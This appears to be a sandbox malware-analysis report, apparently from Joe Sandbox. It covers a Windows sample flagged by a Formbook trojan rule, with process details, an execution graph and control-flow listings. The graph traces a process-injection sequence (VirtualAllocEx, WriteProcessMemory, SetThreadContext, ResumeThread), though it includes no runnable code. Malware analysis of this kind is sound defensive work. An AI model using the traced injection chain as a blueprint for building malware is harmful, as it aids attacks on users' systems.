                                                                                                                                                                                                                                      Imagebase:0x7ff7df3b0000
                                                                                                                                                                                                                                      File size:570'736 bytes
                                                                                                                                                                                                                                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                                      Start time:12:59:24
                                                                                                                                                                                                                                      Start date:02/10/2024
                                                                                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:explorer.exe
                                                                                                                                                                                                                                      Imagebase:0x7ff62d7d0000
                                                                                                                                                                                                                                      File size:5'141'208 bytes
                                                                                                                                                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000010.00000002.2682408997.000000000C39C000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:11.8%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                        Signature Coverage:8.9%
                                                                                                                                                                                                                                        Total number of Nodes:280
                                                                                                                                                                                                                                        Total number of Limit Nodes:19
                                                                                                                                                                                                                                        execution_graph 70247 a21bf20 70248 a21bf65 Wow64GetThreadContext 70247->70248 70250 a21bfad 70248->70250 70486 5624da3 70487 5624d61 70486->70487 70488 5624db1 70486->70488 70487->70486 70491 5e50006 70487->70491 70500 5e50040 70487->70500 70493 5e50055 70491->70493 70492 5e500db 70494 5e500e5 70492->70494 70498 5e50006 GetCurrentThreadId 70492->70498 70499 5e50040 GetCurrentThreadId 70492->70499 70493->70492 70497 5e50110 70493->70497 70494->70487 70495 5e5055f GetCurrentThreadId 70496 5e50214 70495->70496 70496->70487 70497->70495 70497->70496 70498->70494 70499->70494 70502 5e50055 70500->70502 70501 5e500db 70503 5e500e5 70501->70503 70507 5e50006 GetCurrentThreadId 70501->70507 70508 5e50040 GetCurrentThreadId 70501->70508 70502->70501 70506 5e50110 70502->70506 70503->70487 70504 5e5055f GetCurrentThreadId 70505 5e50214 70504->70505 70505->70487 70506->70504 70506->70505 70507->70503 70508->70503 70530 a21fe40 CloseHandle 70531 a21fea7 70530->70531 70509 562d3a0 DuplicateHandle 70510 562d436 70509->70510 70532 5624a80 70534 5624a8c 70532->70534 70535 5e752a1 70532->70535 70536 5e752ad 70535->70536 70540 5e76c38 70536->70540 70545 5e76c48 70536->70545 70537 5e7532c 70541 5e76c6c 70540->70541 70550 5e76e30 70541->70550 70554 5e76e23 70541->70554 70542 5e76c8b 70542->70537 70546 5e76c6c 70545->70546 70548 5e76e23 DeleteFileW 70546->70548 70549 5e76e30 DeleteFileW 70546->70549 70547 5e76c8b 70547->70537 70548->70547 70549->70547 70551 5e76e54 70550->70551 70558 5e77450 70551->70558 70555 5e76e54 70554->70555 70557 5e77450 DeleteFileW 70555->70557 70556 5e76eb5 70556->70542 70557->70556 70559 5e77477 70558->70559 70562 5e7379c 70559->70562 70563 5e775b0 DeleteFileW 70562->70563 70565 5e76eb5 70563->70565 70565->70542 70251 98d01c 70252 98d034 70251->70252 70253 98d08e 70252->70253 70258 5a22c08 70252->70258 70266 5a21ea0 70252->70266 70270 5a21eb0 70252->70270 70274 5a21424 70252->70274 70259 5a22c16 70258->70259 70263 5a22c75 70258->70263 70260 5a22c79 70259->70260 70262 5a22c69 70259->70262 70290 5a2154c 70260->70290 70282 5a22da0 70262->70282 70286 5a22d92 70262->70286 70267 5a21eb0 70266->70267 70268 5a21424 CallWindowProcW 70267->70268 70269 5a21ef7 70268->70269 70269->70253 70271 5a21ed6 70270->70271 70272 5a21424 CallWindowProcW 70271->70272 70273 5a21ef7 70272->70273 70273->70253 70277 5a2142f 70274->70277 70275 5a22c79 70276 5a2154c CallWindowProcW 70275->70276 70279 5a22c77 70276->70279 70277->70275 70278 5a22c69 70277->70278 70280 5a22d92 CallWindowProcW 70278->70280 70281 5a22da0 CallWindowProcW 70278->70281 70280->70279 70281->70279 70283 5a22db4 70282->70283 70294 5a22e58 70283->70294 70284 5a22e40 70284->70263 70288 5a22db4 70286->70288 70287 5a22e40 70287->70263 70289 5a22e58 CallWindowProcW 70288->70289 70289->70287 70291 5a21557 70290->70291 70292 5a2435a CallWindowProcW 70291->70292 70293 5a24309 70291->70293 70292->70293 70293->70263 70295 5a22e69 70294->70295 70297 5a24290 70294->70297 70295->70284 70298 5a2154c CallWindowProcW 70297->70298 70299 5a242aa 70298->70299 70299->70295 70468 a21ce08 70469 a21ce4d Wow64SetThreadContext 70468->70469 70471 a21ce95 70469->70471 70472 a21c588 70473 a21c5c8 VirtualAllocEx 70472->70473 70475 a21c605 70473->70475 70511 a21d7e8 70512 a21d973 70511->70512 70514 a21d80e 70511->70514 70514->70512 70515 a219d48 70514->70515 70516 a21da68 PostMessageW 70515->70516 70517 a21dad4 70516->70517 70517->70514 70566 a21d048 70567 a21d088 ResumeThread 70566->70567 70569 a21d0b9 70567->70569 70300 5623e68 70301 5623e8a 70300->70301 70305 5625249 70301->70305 70309 5625258 70301->70309 70302 5623ef0 70306 5625258 70305->70306 70313 5623b48 70306->70313 70308 5625289 70308->70302 70310 562526f 70309->70310 70311 5623b48 GetModuleHandleW 70310->70311 70312 5625289 70311->70312 70312->70302 70314 5623b53 70313->70314 70317 5623b58 70314->70317 70316 5625325 70316->70308 70318 5623b63 70317->70318 70321 5623b88 70318->70321 70320 5625402 70320->70316 70322 5623b93 70321->70322 70325 5623bb8 70322->70325 70324 5625514 70324->70320 70326 5623bc3 70325->70326 70328 56284fb 70326->70328 70331 562ada1 70326->70331 70327 5628539 70327->70324 70328->70327 70335 562ce80 70328->70335 70340 562add8 70331->70340 70343 562adc9 70331->70343 70332 562adb6 70332->70328 70336 562ce8a 70335->70336 70337 562ced5 70336->70337 70352 562d02f 70336->70352 70356 562d040 70336->70356 70337->70327 70341 562ade7 70340->70341 70347 562aed0 70340->70347 70341->70332 70344 562add2 70343->70344 70345 562ade7 70343->70345 70344->70345 70346 562aed0 GetModuleHandleW 70344->70346 70345->70332 70346->70345 70348 562aee1 70347->70348 70349 562af04 70347->70349 70348->70349 70350 562b108 GetModuleHandleW 70348->70350 70349->70341 70351 562b135 70350->70351 70351->70341 70353 562d040 70352->70353 70354 562d087 70353->70354 70360 562c980 70353->70360 70354->70337 70357 562d04d 70356->70357 70358 562d087 70357->70358 70359 562c980 GetModuleHandleW 70357->70359 70358->70337 70359->70358 70361 562c98b 70360->70361 70363 562d998 70361->70363 70364 562caac 70361->70364 70363->70363 70365 562cab7 70364->70365 70366 5623bb8 GetModuleHandleW 70365->70366 70367 562da07 70366->70367 70367->70363 70518 56240a9 70519 56240b6 70518->70519 70521 5e50006 2 API calls 70519->70521 70522 5e50040 2 API calls 70519->70522 70520 56240d0 70521->70520 70522->70520 70570 5624c0c 70571 5624c28 70570->70571 70572 5624db1 70571->70572 70573 5e50006 2 API calls 70571->70573 70574 5e50040 2 API calls 70571->70574 70573->70571 70574->70571 70575 5a29050 70576 5a29072 70575->70576 70577 5628208 GetModuleHandleW 70575->70577 70578 5623bb8 GetModuleHandleW 70575->70578 70577->70576 70578->70576 70368 73ca4a8 70370 73ca4bc 70368->70370 70369 73ca4fe 70426 a2134d7 70369->70426 70430 a2134e8 70369->70430 70370->70369 70383 a211301 70370->70383 70389 a211d1f 70370->70389 70394 a2113e9 70370->70394 70400 a2112cb 70370->70400 70404 a211991 70370->70404 70408 a211524 70370->70408 70412 a210f74 70370->70412 70416 a2117a3 70370->70416 70421 a2113b0 70370->70421 70371 73ca53b 70384 a211304 70383->70384 70385 a2112cb 70383->70385 70434 a213381 70385->70434 70439 a2133e0 70385->70439 70386 a2112dc 70390 a211d24 70389->70390 70392 a213381 VirtualProtect 70390->70392 70393 a2133e0 VirtualProtect 70390->70393 70391 a211d39 70391->70370 70392->70391 70393->70391 70395 a2113b3 70394->70395 70396 a2113ec 70394->70396 70398 a213381 VirtualProtect 70395->70398 70399 a2133e0 VirtualProtect 70395->70399 70397 a2113c1 70398->70397 70399->70397 70402 a213381 VirtualProtect 70400->70402 70403 a2133e0 VirtualProtect 70400->70403 70401 a2112dc 70402->70401 70403->70401 70406 a213381 VirtualProtect 70404->70406 70407 a2133e0 VirtualProtect 70404->70407 70405 a2119a2 70406->70405 70407->70405 70410 a213381 VirtualProtect 70408->70410 70411 a2133e0 VirtualProtect 70408->70411 70409 a211537 70410->70409 70411->70409 70414 a213381 VirtualProtect 70412->70414 70415 a2133e0 VirtualProtect 70412->70415 70413 a210f87 70414->70413 70415->70413 70417 a2117a6 70416->70417 70419 a213381 VirtualProtect 70417->70419 70420 a2133e0 VirtualProtect 70417->70420 70418 a2117d9 70419->70418 70420->70418 70422 a2113b3 70421->70422 70424 a213381 VirtualProtect 70422->70424 70425 a2133e0 VirtualProtect 70422->70425 70423 a2113c1 70424->70423 70425->70423 70427 a2134e8 70426->70427 70428 a2135e3 70427->70428 70442 a214bf0 70427->70442 70428->70371 70432 a213504 70430->70432 70431 a2135e3 70431->70371 70432->70431 70433 a214bf0 CreateProcessAsUserW 70432->70433 70433->70432 70435 a2133ca VirtualProtect 70434->70435 70438 a21338a 70434->70438 70437 a213462 70435->70437 70437->70386 70438->70386 70440 a213428 VirtualProtect 70439->70440 70441 a213462 70440->70441 70441->70386 70443 a214bc7 70442->70443 70445 a214c46 70442->70445 70443->70427 70444 a214dd9 70444->70427 70445->70444 70447 a215d3e 70445->70447 70450 a218ad8 70447->70450 70452 a218aff 70450->70452 70451 a215d56 70452->70451 70454 a21a418 70452->70454 70455 a21a497 CreateProcessAsUserW 70454->70455 70457 a21a598 70455->70457 70458 5e51af0 70461 5623bb8 GetModuleHandleW 70458->70461 70462 5628208 70458->70462 70459 5e51b03 70461->70459 70463 562820d 70462->70463 70465 56284fb 70463->70465 70466 562ada1 GetModuleHandleW 70463->70466 70464 5628539 70464->70459 70465->70464 70467 562ce80 GetModuleHandleW 70465->70467 70466->70465 70467->70464 70579 5e54090 70580 5e5409e 70579->70580 70581 5e5404e 70579->70581 70581->70580 70584 5e51138 70581->70584 70583 5e5407f 70585 5e51143 70584->70585 70587 5628208 GetModuleHandleW 70585->70587 70588 5623bb8 GetModuleHandleW 70585->70588 70586 5e5450c 70586->70583 70587->70586 70588->70586 70594 a21c858 70595 a21c8a0 WriteProcessMemory 70594->70595 70597 a21c8f7 70595->70597 70476 562d158 70477 562d19e GetCurrentProcess 70476->70477 70479 562d1f0 GetCurrentThread 70477->70479 70480 562d1e9 70477->70480 70481 562d226 70479->70481 70482 562d22d GetCurrentProcess 70479->70482 70480->70479 70481->70482 70485 562d263 70482->70485 70483 562d28b GetCurrentThreadId 70484 562d2bc 70483->70484 70485->70483 70523 5a21cf8 70524 5a21d60 CreateWindowExW 70523->70524 70526 5a21e1c 70524->70526 70526->70526 70527 73cb560 70528 73cb5a8 VirtualProtect 70527->70528 70529 73cb5e2 70528->70529

                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                        Function 073CE3A8 Relevance: 2.8, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 117 73ce3a8-73ce3cd 118 73ce3cf 117->118 119 73ce3d4-73ce3f1 117->119 118->119 120 73ce3f9 119->120 121 73ce400-73ce41c 120->121 122 73ce41e 121->122 123 73ce425-73ce426 121->123 122->120 122->123 124 73ce63c-73ce65c 122->124 125 73ce55e-73ce562 122->125 126 73ce5de-73ce5e7 122->126 127 73ce73a-73ce73e 122->127 128 73ce531-73ce53d 122->128 129 73ce613-73ce625 122->129 130 73ce4cc-73ce4e3 122->130 131 73ce6ec-73ce6f8 122->131 132 73ce58e-73ce5a5 122->132 133 73ce46f-73ce483 122->133 134 73ce488-73ce49d 122->134 135 73ce5aa-73ce5b6 122->135 136 73ce62a-73ce637 122->136 137 73ce76a-73ce77c 122->137 138 73ce42b-73ce440 122->138 139 73ce507-73ce52c 122->139 140 73ce720-73ce735 122->140 141 73ce661-73ce66d 122->141 142 73ce781-73ce7a2 122->142 143 73ce4a2-73ce4ae 122->143 144 73ce442-73ce446 122->144 123->142 124->121 145 73ce564-73ce573 125->145 146 73ce575-73ce57c 125->146 153 73ce5e9-73ce5f8 126->153 154 73ce5fa-73ce601 126->154 157 73ce740-73ce74f 127->157 158 73ce751-73ce758 127->158 161 73ce53f 128->161 162 73ce544-73ce559 128->162 129->121 168 73ce4eb-73ce502 130->168 151 73ce6ff-73ce71b 131->151 152 73ce6fa 131->152 132->121 133->121 134->121 147 73ce5bd-73ce5d9 135->147 148 73ce5b8 135->148 136->121 137->121 138->121 139->121 140->121 159 73ce66f 141->159 160 73ce674-73ce68a 141->160 155 73ce4b5 143->155 156 73ce4b0 143->156 149 73ce448-73ce457 144->149 150 73ce459-73ce460 144->150 163 73ce583-73ce589 145->163 146->163 147->121 148->147 164 73ce467-73ce46d 149->164 150->164 151->121 152->151 165 73ce608-73ce60e 153->165 154->165 174 73ce4bf-73ce4c7 155->174 156->155 166 73ce75f-73ce765 157->166 158->166 159->160 177 73ce68c 160->177 178 73ce691-73ce6a7 160->178 161->162 162->121 163->121 164->121 165->121 166->121 168->121 174->121 177->178 180 73ce6ae-73ce6c4 178->180 181 73ce6a9 178->181 183 73ce6cb-73ce6e7 180->183 184 73ce6c6 180->184 181->180 183->121 184->183
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: P=$P=
                                                                                                                                                                                                                                        • API String ID: 0-3190148945
                                                                                                                                                                                                                                        • Opcode ID: 409ea76f880a7e54395a269d9cb116ba57f0a210e9b3182bff8ef4da82a9bb7f
                                                                                                                                                                                                                                        • Instruction ID: ce6f0839a5f3bb62968616278788865007c62f402269c559d25a99386448b886
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 409ea76f880a7e54395a269d9cb116ba57f0a210e9b3182bff8ef4da82a9bb7f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BDC15BB4E5021ADFDB04CFAAC5858AEFBB6FF49341F208869D419AB214D734D942CF90
                                                                                                                                                                                                                                        Function 056216B8 Relevance: 2.6, Strings: 2, Instructions: 149COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 186 56216b8-56216da 187 56216e1-56216ef 186->187 188 56216dc 186->188 189 56216f1-5621703 187->189 190 5621705 187->190 188->187 191 5621708-562170f 189->191 190->191 192 5621816 191->192 193 5621715 191->193 197 562181c-5621823 192->197 194 562171c-5621738 193->194 195 5621741-5621742 194->195 196 562173a 194->196 201 5621747 195->201 204 56218ef-56218f0 195->204 196->192 196->193 198 5621881-56218b8 196->198 199 56217d6-56217e3 196->199 200 56217b7-56217d1 196->200 196->201 202 56218da-56218ea 196->202 203 562177b-562178b 196->203 196->204 205 562184f-5621861 196->205 206 562175c 196->206 207 5621836-562183d 197->207 208 5621825-5621834 197->208 227 56218c3-56218d5 198->227 218 56217f6-56217fd 199->218 219 56217e5-56217f4 199->219 200->194 230 562174c call 5621cd3 201->230 231 562174c call 5621cd8 201->231 202->194 220 562179e-56217a5 203->220 221 562178d-562179c 203->221 204->192 228 5621864 call 5621bc3 205->228 229 5621864 call 5621bc8 205->229 232 5621761 call 5621d44 206->232 233 5621761 call 5621d08 206->233 234 5621761 call 5621d18 206->234 209 5621844-562184a 207->209 208->209 213 5621752-562175a 213->194 214 5621767-5621779 214->194 225 5621804-5621811 218->225 219->225 224 56217ac-56217b2 220->224 221->224 222 562186a-562187c 222->194 224->194 225->194 227->194 228->222 229->222 230->213 231->213 232->214 233->214 234->214
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %$%
                                                                                                                                                                                                                                        • API String ID: 0-1956856143
                                                                                                                                                                                                                                        • Opcode ID: 50bde0a2997e0f8a75c812797296579908183833f3da381c8f19fa89aff00283
                                                                                                                                                                                                                                        • Instruction ID: 8f2d8e830006f885441c8848e897c4ae19cb41d81e9c0130b48f657ddc7937c2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 50bde0a2997e0f8a75c812797296579908183833f3da381c8f19fa89aff00283
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC514AB4D0921DDFDB08CFA6D4946AEBBB2FB8A301F108429D416A7394DB385942CF54
                                                                                                                                                                                                                                        Function 056216A9 Relevance: 2.6, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 235 56216a9-56216da 236 56216e1-56216ef 235->236 237 56216dc 235->237 238 56216f1-5621703 236->238 239 5621705 236->239 237->236 240 5621708-562170f 238->240 239->240 241 5621816 240->241 242 5621715 240->242 246 562181c-5621823 241->246 243 562171c-5621738 242->243 244 5621741-5621742 243->244 245 562173a 243->245 250 5621747 244->250 253 56218ef-56218f0 244->253 245->241 245->242 247 5621881-562189c 245->247 248 56217d6 245->248 249 56217b7 245->249 245->250 251 56218da-56218ea 245->251 252 562177b-562178b 245->252 245->253 254 562184f-5621861 245->254 255 562175c 245->255 256 5621836-562183d 246->256 257 5621825-5621834 246->257 272 56218a3-56218b8 247->272 261 56217dc-56217e3 248->261 259 56217bf-56217d1 249->259 279 562174c call 5621cd3 250->279 280 562174c call 5621cd8 250->280 251->243 269 562179e-56217a5 252->269 270 562178d-562179c 252->270 253->241 277 5621864 call 5621bc3 254->277 278 5621864 call 5621bc8 254->278 281 5621761 call 5621d44 255->281 282 5621761 call 5621d08 255->282 283 5621761 call 5621d18 255->283 258 5621844-562184a 256->258 257->258 259->243 267 56217f6-56217fd 261->267 268 56217e5-56217f4 261->268 262 5621752-562175a 262->243 263 5621767-5621779 263->243 274 5621804-5621811 267->274 268->274 273 56217ac-56217b2 269->273 270->273 271 562186a-562187c 271->243 276 56218c3-56218d5 272->276 273->243 274->243 276->243 277->271 278->271 279->262 280->262 281->263 282->263 283->263
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %$%
                                                                                                                                                                                                                                        • API String ID: 0-1956856143
                                                                                                                                                                                                                                        • Opcode ID: 02d05ba679fd04da7dae98a33c03878532f184cd88b24cd4b14767de8ab717c0
                                                                                                                                                                                                                                        • Instruction ID: cc569d70d88548ce2b57406647514fbf196774d2dc20d2f243b2b1a87ff5daeb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02d05ba679fd04da7dae98a33c03878532f184cd88b24cd4b14767de8ab717c0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9518F74D09219DFDB08CFE6D4946AEBBB2FF8A301F00842AD416A7394DB384942CF54
                                                                                                                                                                                                                                        Function 0A21A418 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 486 a21a418-a21a4a3 488 a21a4a5-a21a4ab 486->488 489 a21a4ae-a21a4b5 486->489 488->489 490 a21a4c0-a21a4d8 489->490 491 a21a4b7-a21a4bd 489->491 492 a21a4e9-a21a596 CreateProcessAsUserW 490->492 493 a21a4da-a21a4e6 490->493 491->490 495 a21a598-a21a59e 492->495 496 a21a59f-a21a61e 492->496 493->492 495->496 503 a21a630-a21a637 496->503 504 a21a620-a21a626 496->504 505 a21a639-a21a648 503->505 506 a21a64e 503->506 504->503 505->506
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 0A21A583
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateProcessUser
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2217836671-0
                                                                                                                                                                                                                                        • Opcode ID: 375c20aaabe52d271838b4cff8d30bad29d3cf44251ea9ad2d342cf97b3a3455
                                                                                                                                                                                                                                        • Instruction ID: 88a54dd4d2e6980aaccee3eea0540440966909b82951f3b219924248ad964dc4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 375c20aaabe52d271838b4cff8d30bad29d3cf44251ea9ad2d342cf97b3a3455
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D51077191026ADFDB24CF55C880BDDBBB5BF88314F0081AAE908B7250DB719A85CFA0
                                                                                                                                                                                                                                        Function 05623E68 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: :sF
                                                                                                                                                                                                                                        • API String ID: 0-2912757881
                                                                                                                                                                                                                                        • Opcode ID: 28c8965bf2c728c2ff560ddba1f15ef1e8cc660c0a1f8e227ddc46c237f8582a
                                                                                                                                                                                                                                        • Instruction ID: 0c51a3ee9c0f3fe001b03ba795f0b16fe861201147e27edf61afde1a72fc0253
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 28c8965bf2c728c2ff560ddba1f15ef1e8cc660c0a1f8e227ddc46c237f8582a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AFD10870E05628CFDB24CF66D9446DDBBB2BB8A301F10D5AAD409AB354EB349E81CF51
                                                                                                                                                                                                                                        Function 0A2153B8 Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: {:u
                                                                                                                                                                                                                                        • API String ID: 0-2668801488
                                                                                                                                                                                                                                        • Opcode ID: aff338392bc7519ab9aedfccaa0782b835be21eb042da29c3a7dcc8a3c71ab59
                                                                                                                                                                                                                                        • Instruction ID: 2ab04e1cd43d35e5a1155f210e2bb0bdaee9fcc4df084c78f714a171a4a93123
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aff338392bc7519ab9aedfccaa0782b835be21eb042da29c3a7dcc8a3c71ab59
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62914570A242289FCB64CF6AC9847DABBF2FF89340F5491E6D44DA7214D7309E818F51
                                                                                                                                                                                                                                        Function 05621198 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: -Ex
                                                                                                                                                                                                                                        • API String ID: 0-3578307018
                                                                                                                                                                                                                                        • Opcode ID: 39bc56f1f3333c4eefb23cf4e53caf7f8c8a3f6a8d3fa567b8181e4ebaf95beb
                                                                                                                                                                                                                                        • Instruction ID: 349082d162958c17bb9fd06295ed4991bcecb0c17abf8b5f3f06a38271b33f52
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39bc56f1f3333c4eefb23cf4e53caf7f8c8a3f6a8d3fa567b8181e4ebaf95beb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32610674E04618DFCB08DFE6E884A9DBBB2FF89301F10846AD405A7354DB345A46DF51
                                                                                                                                                                                                                                        Function 056211A8 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: -Ex
                                                                                                                                                                                                                                        • API String ID: 0-3578307018
                                                                                                                                                                                                                                        • Opcode ID: 3e66b99531cc166b808bb50f0ad2a4598997961ca9a061bbb0a37fac809e29d5
                                                                                                                                                                                                                                        • Instruction ID: 8eaface96235e8684cd3b98072e3116b8d44dadbb52eae594301b5014f831e66
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e66b99531cc166b808bb50f0ad2a4598997961ca9a061bbb0a37fac809e29d5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A461D374E04618DFCB04DFE6E884AADBBB2FF89301F10846AD816A7358DB355A46DF50
                                                                                                                                                                                                                                        Function 0A214BF0 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: _7i,
                                                                                                                                                                                                                                        • API String ID: 0-367628272
                                                                                                                                                                                                                                        • Opcode ID: 01515e38369b1e617a3cccc05ba78ad1995763e5d3faacd2fe0e03ef6655860b
                                                                                                                                                                                                                                        • Instruction ID: d57cd8351d96e976c3a93443701e17970e03583816e56c401d0eea443cd55d7c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 01515e38369b1e617a3cccc05ba78ad1995763e5d3faacd2fe0e03ef6655860b
